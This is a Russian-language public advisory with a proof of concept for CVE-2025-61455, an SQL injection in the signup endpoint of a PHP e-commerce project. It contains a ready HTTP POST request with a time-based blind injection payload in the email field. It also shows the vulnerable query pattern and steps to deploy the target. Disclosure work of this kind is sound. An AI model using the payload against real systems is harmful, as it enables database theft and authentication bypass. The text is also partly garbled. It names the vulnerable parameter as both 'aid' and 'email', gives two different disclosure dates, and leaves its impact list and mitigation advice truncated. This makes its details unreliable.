
Публичное раскрытие и proof-of-concept для CVE-2025-61455, критической SQL-инъекции в E-commerce Project v1.0, включая технические детали, PoC и рекомендации по смягчению последствий.
Дата раскрытия: 14 октября 2025 г.
Идентификатор CVE: CVE-2025-61455
Серьёзность: КРИТИЧЕСКАЯ (CVSS 9.8)
Критическая уязвимость SQL-инъекции существует в E-commerce Project v1.0, а именно в конечной точке signup.inc.php. Приложение напрямую включает несанитизированные пользовательские данные в SQL-запросы, что позволяет неаутентифицированным злоумышленникам обходить аутентификацию и выполнять произвольные SQL-команды.
Данной проблеме присвоен идентификатор CVE-2025-61455. На момент публичного раскрытия официального исправления не было.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpПриложение использует несанитизированные входные данные непосредственно в SQL-запросах без какой-либо проверки входных данных или подготовленных выражений. Уязвимость существует в параметре aid файла signup.inc.php.
Злоумышленник может внедрить вредоносный SQL-код через параметр email, что позволяет проводить атаки с использованием time-based слепой SQL-инъекции.
Пример уязвимого шаблона кода:
$query = "SELECT * FROM table WHERE email='$email'";
Это позволяет использовать полезные нагрузки для инъекций, которые могут манипулировать логикой запросов и извлекать конфиденциальные данные.
| Идентификатор CWE | Название |
|---|---|
| CWE-89 | Некорректная нейтрализация специальных элементов, используемых в SQL-команде |
| Балл | Серьёзность | Векторная строка |
|---|---|---|
| 9.8 | КРИТИЧЕСКАЯ | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Успешная эксплуатация может привести к:
git clone https://github.com/Bhabishya-123/E-commerce.git
Используйте XAMPP/LAMP для развёртывания проекта и перейдите по адресу:
http://localhost/e-commerce-main/includes/signup.inc.php
Отправьте следующий вредоносный HTTP-запрос:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Пояснение:
Параметр email содержит полезную нагрузку для time-based SQL-инъекции: '+(select*from(select(sleep(20)))a)+'
Если приложение задерживает ответ на 20 секунд, SQL-инъекция прошла успешно.
mysqli_prepare() или PDO).| Событие | Дата |
|---|---|
| Уязвимость обнаружена | 16 сентября 2025 г. |
| Публичное раскрытие | 13 октября 2025 г. |
| Исправление доступно | ❌ Недоступно на момент раскрытия |
Эта уязвимость была обнаружена и ответственно раскрыта:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Данное уведомление опубликовано независимо из-за отсутствия ответа от поставщика.